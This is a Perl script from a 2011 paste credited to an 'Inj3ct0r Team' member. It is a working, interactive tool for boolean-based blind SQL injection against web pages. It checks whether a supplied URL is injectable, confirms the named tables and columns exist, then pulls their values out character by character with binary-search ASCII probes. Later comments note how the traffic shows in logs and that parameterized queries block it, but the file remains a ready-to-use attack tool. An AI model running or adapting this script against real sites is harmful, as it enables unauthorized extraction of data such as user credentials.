
Blind SQL injection [perl] by Angel Injection

Oct 6th, 2011
  1. #!/usr/bin/perl
  2. use LWP::Simple;
  3. use Time::HiRes qw(gettimeofday);
  4. ###############################################################
  5.  
# Boolean-based blind SQL injection extraction script, driven interactively
# from STDIN: a target URL, a marker string that separates the "true" and
# "false" responses, then a table name, column names and an optional WHERE
# condition.  Every probe below is a plain GET with a literal `+and+...`
# clause appended to the URL, so the payloads land verbatim in web-server
# access logs, and the length and extraction loops issue one request per
# candidate value -- a high-volume, highly regular request pattern.  On the
# server side, parameterized queries (bound variables) remove the injection
# point these probes depend on.

$string='';   # marker text; empty => prompted for in Stage 2
$limit=0;     # row offset used in the `limit+$limit,1` clause of the probes

# $string #########################################################
# If the marker string you want to use cannot be typed on the     #
# shell, set it here; when the script prompts for the string,     #
# just press Enter.                                               #
###################################################################

# $limit ##########################################################
# To extract a different row, change this variable: it is the     #
# offset in the `limit $limit,1` clause of every probe query.     #
###################################################################


# ASCII codes of the punctuation characters searched by brute_sym (indexes
# 0..32); opt_sym slices this table by the character class opt() detected.
@ascii_sym = (32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,58,59,60,61,62,63,64,91,92,93,94,95,96,123,124,125,126);
# Set by strc(): 1 when the marker is only in the true page, 0 when only in
# the false page.  Read by chvar() to interpret every later probe.
$glob_stat;

print "\n\t===============================================*\n";
print "\t* Blind Sql Injection Tool *\n";
print "\t* Coded By Angel Injection *\n";
print "\t* Member From Inj3ct0r Team *\n";
print "\t* Thanks To:r0073r,Sid3^effects,r4dc0re,CrosS, *\n";
print "\t===============================================*\n\n";

# Stage 1: fetch the "and 1=1" and "and 1=0" pages and compare them (def).
print "Stage 1:Checking if the target is vulnerable\n\n";
print "You should now enter the infected url\n";
print "Example :http://www.localhost/index.php?id=1\n\n";
print "URL: ";
my $url = <STDIN>;
chomp($url);
# Time the first request; $exect is reused as the per-request cost in the
# Stage 3-2 time estimate.
$now = time_mili();
my $yes = get("$url+and+1=1");
$later = time_mili();
$exect = $later - $now;
$exect = sprintf("%.2f", $exect);
my $no = get("$url+and+1=0");
# def() exits the script unless the two responses differ "enough".
def($yes,$no);
print "Stage 2 :[*] Checking For A String That Can lead To exploit The Target[*]\n\n";
print " You should now enter a string(from shell or source code)\n";
print " and wait to see if is a good one. Your string must be \n";
print " related to the target\n\n";
print " The string must exist on the true page or the false page \n";
print " but not on both of them.\n";
print " A file has been created under the name string.txt it may help\n";
print " you to choose your string\n\n";

# Stage 2: keep prompting until strc() finds the marker in exactly one of
# the two baseline pages; a preset $string gets a single check only.
if($string eq ''){
print "String: ";
$string = <STDIN>;
chomp($string);
while(strc($yes,$no)!=1){
print "String: ";
$string = <STDIN>;
chomp($string);
}
}
else{
if(strc($yes,$no)!=1){
print "Please Choose another one\n: ";
exit;
}
}
chomp($string);
print "\n => Nice choice\n\n";

print "Stage 3 :[*] Extracting Information From Database[*]\n\n";
print " You should now enter The Table name\n";
print " and number of Columns to be extracted\n";
print " and their names and condition on this columns\n";
print " if you want it\n\n";

print "Table Name : ";
my $tbname = <STDIN>;
chomp($tbname);
print "Columns Number : ";
my $num = <STDIN>;
chomp($num);
# Accept only an (optionally signed) integer for the column count.
if($num =~ /^[+-]?\d+$/){
chomp($num);
}
else{
while($num !~ /^[+-]?\d+$/){
print "Columns Number : ";
$num = <STDIN>;
chomp($num);
}
}
chomp($num);
# Only @column is declared lexically here: the comma separates statements,
# and `@trcolmun` is spelled differently from the `@trcolumn` used below, so
# the remaining arrays are package globals (the file has no `use strict`).
my @column,@trcolmun,@numtr,@result;
for(my $q=0;$q<$num;$q++){
print "Columns Name : ";
$column[$q] = <STDIN>;
chomp($column[$q]);
}

# Optional condition; $condition is interpolated verbatim into every probe.
print "\n Do You have any condition on your information\n";
print " Exemple: where id=1\n\n";
print "(yes/no): ";
my $condt = <STDIN>;
chomp($condt);
if($condt eq 'yes'){
print "\nEnter Condition: ";
$condition=<STDIN>;
chomp($condition);
}
# Stage 3-1: one probe for the table, one per requested column.  Columns
# confirmed by chvar() are copied into @trcolumn (count in $j and $trco).
print "\nStage 3-1 :[*] Checking table and columns[*]\n\n";
print " Nothing That You Can do it now\n";
print " just let the script do his job\n\n";
my $pr=chvar("$url+and+(SELECT 1 from $tbname limit 0,1)=1");
if($pr==1){
print " => Table Existe\n";
}
else{
print " => Table Dosn't Existe";
exit;
}
my $j=0;
for(my $q=0;$q<$num;$q++){
$pr = chvar("$url+and+(SELECT substring(concat(1,$column[$q]),1,1) from $tbname limit 0,1)=1");
if($pr==1){
$trcolumn[$j] = $column[$q];
print " => Column $column[$q] Existe\n";
$j++;
}
else{
print " => Column $column[$q] Dosn't Existe\n";
}
}
$trco = @trcolumn;
if($trco==0){
print "\n => No Columns Found\n";
exit;
}

# Stage 3-2: value length per column.  The query appends "::" (0x3a 0x3a)
# to the value and the loop walks position $ii until it finds two ':' in a
# row; a lone ':' inside the value is skipped by the look-ahead at $ii+1.
# On exit $ii points one past the second ':', hence the `-= 3`.
print "\nStage 3-2 :[*] Extracting Columns length[*]\n\n";
print " The Script is going now to get each\n";
print " columns length\n";
print "\nCounting length of Columns...\n\n";
for(my $q=0;$q<$j;$q++){
my $qj=0;
my $ii=1;
while($qj==0){
$pr = chvar("$url+and+ascii(substring((select concat($trcolumn[$q],0x3a,0x3a)+from+$tbname $condition limit+$limit,1),$ii,1))=58");
if($pr==1){
$ii++;
$pr = chvar("$url+and+ascii(substring((select concat($trcolumn[$q],0x3a,0x3a)+from+$tbname $condition limit+$limit,1),$ii,1))=58");
if($pr==1){
$qj=1;
}
else{
$ii--
}
}
$ii++;
}
$ii -=3;
$numtr[$q]=$ii;
print " => $trcolumn[$q] : $ii\n";
}
for(my $rul=0;$rul<$trco;$rul++){
$result[$rul]='';
}
# Rough upper bound for the run time: length * baseline request time * 8
# (the opt() helpers issue several probes per character).
$gtf=0;
($second, $minute, $hour) = localtime();
print "\nExtracting information ...\n\n";
print "Guessing time for each column(in seconds)\n\n";
for(my $idn=0;$idn<$trco;$idn++){
$max = $numtr[$idn] * $exect * 8;
$max=sprintf("%.2f", $max);
$gtf+=$max;
print " #=> $trcolumn[$idn] max time of extraction = $max\n";
}
print "\nStart at $hour:$minute:$second (expected time to finish (in seconds) : $gtf)\n\n";
# Extraction: opt() returns one ASCII code per position, packed into a byte
# and appended to $result[$bn]; elapsed time per column is printed.
$now1 = time_mili();
for(my $bn=0;$bn<$trco;$bn++){
$nowt = time_mili();
for(my $bnum=1;$bnum<=$numtr[$bn];$bnum++){
my $ascii=opt("$url+and+ascii(substring((select concat($trcolumn[$bn],0x3a)+from+$tbname $condition limit+$limit,1),$bnum,1))");
$result[$bn].=pack("c",$ascii);
}
$latert = time_mili();
$realt = $latert - $nowt;
$realt=sprintf("%.2f", $realt);
print " => $trcolumn[$bn] = [$result[$bn]] (real time = $realt)\n";
}
$later1 = time_mili();
$exect1 = $later1 - $now1;
$exect1 = sprintf("%.2f", $exect1);
($second, $minute, $hour) = localtime() ;
print "\nFinish at $hour:$minute:$second (elapsed time (in seconds) : $exect1) \n\n";
  198.  
# Recover one character of the selected value.  $_[0] is a probe URL that
# ends in an `ascii(substring(...))` expression; each comparison below is
# appended to it.  Three range probes (">57", ">96", ">65") choose a class
# -- digit, lower-case letter, upper-case letter -- and the matching
# brute_* helper searches inside it.  $sym_st records the class tried
# (1 digit, 2 upper, 3 lower) so that opt_sym() can fall back to the
# punctuation table when the helper came back empty (ord($rt) == 0).
# Returns the ASCII code as a number; the caller packs it into a byte.
sub opt{
my $url=$_[0];
my $isnum = $url;
my $sym_st;
$isnum .= ">57";
my $isalpha = $url;
$isalpha .= ">96";
my $isAlpha = $url;
$isAlpha .= ">65";
my $rt='';
my $brp = chvar($isnum);
if($brp==1){
my $brp1 = chvar($isalpha);
if($brp1==1){
$rt = brute_alpha($url,97,103,110,115,122);
$sym_st=3;
}
else{
$rt = brute_alpha($url,65,71,78,83,90);
$sym_st=2;
}
}
else{
$rt = brute_num($url);
$sym_st=1;
}

# An empty/undefined result means nothing in the class matched, so the
# character must be punctuation from the neighbouring range.
if(ord($rt) == 0){
$rt = opt_sym($url,$sym_st);
}
return $rt;
}
  231.  
# Punctuation fallback for opt().  $_[0] is the probe URL, $_[1] the class
# code set by opt(): 1 = below '0' (one ">40" probe picks @ascii_sym[0..7]
# or [8..15]), 2 = between '9' and 'A' (@ascii_sym[16..22]), anything else
# = the bracket/backslash/brace/tilde group (@ascii_sym[23..32]).
# Returns the matched ASCII code from @ascii_sym.
sub opt_sym(){
my $url = $_[0];
my $rt='';
if($_[1]==1){
my $ft = $url;
$ft .= ">40";
my $rft = chvar($ft);
if($rft==1){
$rt = brute_sym($url,8,15);
}
else{
$rt = brute_sym($url,0,7);
}
}
else{
if($_[1]==2){
$rt=brute_sym($url,16,22);
}
else{
$rt=brute_sym($url,23,32);
}
}
return $rt;
}
  256.  
# Linear search over a code range: for each $i in $_[0]..$_[1] append
# "=$i" to the probe URL $_[2] and return the first $i for which chvar()
# reports a true response.  One HTTP request per candidate.  The `last`
# after `return` is unreachable; when nothing in the range matches the sub
# simply falls off the end with no explicit return value.
sub reduse{
for(my $i=$_[0];$i<=$_[1];$i++){
my $tmp = $_[2];
$tmp .="=$i";
my $qq = chvar($tmp);
if($qq==1){
return $i;
last;
}
}
}
  268.  
# Search the slice @ascii_sym[$_[1]..$_[2]] for the code whose "=code"
# probe on URL $_[0] is true and return that ASCII code.  $ek stays undef
# when nothing matches, in which case $ascii_sym[undef] resolves to index 0
# (32, the space character).
sub brute_sym(){
my $ek;
for(my $i=$_[1];$i<=$_[2];$i++){
my $tmp = $_[0];
$tmp .="=$ascii_sym[$i]";
my $qq = chvar($tmp);
if($qq==1){
$ek=$i;
last;
}
}
return $ascii_sym[$ek];
}
  282.  
# Digit search for opt(): one ">52" probe halves the range '0'..'9', then
# reduse() scans the remaining five codes (53..57 or 48..52) on URL $_[0].
# Returns the matched code, or nothing when no digit matches.
sub brute_num(){
my $url = $_[0];
my $ft = $url;
my $rt='';
$ft .= ">52";
my $mrp = chvar($ft);
if($mrp==1){
$rt = reduse(53,57,$url);
}
else{
$rt = reduse(48,52,$url);
}
return $rt;
}
  297.  
# Letter search for opt().  Arguments: $_[0] probe URL, $_[1] first code of
# the range, $_[2] $_[3] $_[4] three ascending split points, $_[5] last
# code.  Up to three ">split" probes narrow the range to one of four
# sub-ranges, which reduse() then scans.  Called with (97,103,110,115,122)
# for lower case and (65,71,78,83,90) for upper case.
# Returns the matched code, or nothing when no letter in the range matches.
sub brute_alpha(){
my $url = $_[0];
my $ft = $url;
my $sd = $url;
my $td = $url;
my $rt ='';
$ft .= ">$_[2]";
$sd .= ">$_[3]";
$td .= ">$_[4]";
my $mrp = chvar($ft);
if($mrp==1){
my $mrp1 = chvar($sd);
if($mrp1==1){
my $mrp2=chvar($td);
if($mrp2==1){
$rt = reduse(($_[4]+1),$_[5],$url);
}
else{
$rt = reduse(($_[3]+1),$_[4],$url);
}
}
else{
$rt = reduse(($_[2]+1),$_[3],$url);
}
}
else{
$rt = reduse($_[1],$_[2],$url);
}
return $rt;
}
  328.  
  329.  
# Decide which of the two baseline pages carries the marker $string.
# $_[0] is the "and 1=1" response, $_[1] the "and 1=0" response.  Sets
# $glob_stat to 1 when the marker is only in the true page, 0 when only in
# the false page, and returns 1 in either case; returns 0 when the marker
# is on both pages and nothing when it is on neither (the Stage 2 loop
# treats both as "choose another string").
# NOTE: $string is interpolated as a pattern, not matched literally, so
# regex metacharacters in the marker change its meaning.  $tmp is unused.
sub strc{
my $tmp=0;
if(($_[0] =~ /$string/) && ($_[1] !~ /$string/)){
$glob_stat=1;
return 1;
}
elsif(($_[1] =~ /$string/) && ($_[0] !~ /$string/)){
$glob_stat=0;
return 1;
}
elsif(($_[1] =~ /$string/) && ($_[0] =~ /$string/)){
return 0;
}
}
  344.  
# Stage 1 heuristic.  Splits the two baseline responses ($_[0] true page,
# $_[1] false page) into characters, walks to the longer length comparing
# position by position, collects every differing character of the true
# page into $rt and counts them in $j.  If 5 < $j < (length - 300) the
# target is reported as "maybe vulnerable" and $rt is written to
# string.txt as a hint for choosing the Stage 2 marker; otherwise the
# script prints "Not Vulnerable" and exits.
# Past the end of the shorter response $fi[$i] / $sd[$i] are undef.
# The file is opened with a bareword handle and two-arg open, unchecked.
sub def{
my @fi = split(//,$_[0]);
my @sd = split(//,$_[1]);
my $rt='';
my $cn = @fi;
my $cn1 = @sd;
my $k;
($cn>$cn1) ? $k=$cn : $k=$cn1;
my $i,$j=0;
for($i=0;$i<$k;$i++){
if($fi[$i] ne $sd[$i]){
$rt.=$fi[$i];
$j++;
}
}
if(($j>5) && ($j<($i-300))){
print "\n => Target Maybe Vulnerable\n\n";
open(MYFILE,'>string.txt');
print MYFILE $rt;
close(MYFILE);
}
else{
print "\n => Target Not Vulnerable\n\n";
exit;
}
}
  371.  
# Issue one probe GET for URL $_[0] and normalize the answer to the page
# polarity recorded by strc(): returns 1 when the response "looks like the
# true page" (marker present and $glob_stat==1, or marker absent and
# $glob_stat==0) and 0 otherwise.  Every call is one HTTP request; the
# search helpers call it several times per extracted character, which is
# what makes the traffic pattern of this script stand out in access logs.
sub chvar{
my $url=$_[0];
my $tmp = get($url);
if($tmp=~/$string/){
if($glob_stat==1){
return 1;
}
elsif($glob_stat==0){
return 0;
}
}
elsif($tmp!~/$string/){
if($glob_stat==1){
return 0;
}
elsif($glob_stat==0){
return 1;
}
}
}
  392.  
# Wall-clock time as a number of seconds with three decimals.  Builds the
# string "$s.$m" from gettimeofday's seconds and microseconds and forces it
# numeric; the microsecond part is not zero-padded, so the fractional
# digits are only approximate (e.g. 5 us becomes ".5").
# Only $s is declared lexically here; $m and $r are package globals.
sub time_mili(){
my $s,$m,$r;
($s,$m) = gettimeofday();
$r = "$s.$m";
$r +=0;
my $rt = sprintf("%.3f", $r);
$rt +=0;
return $rt;
}
  402.  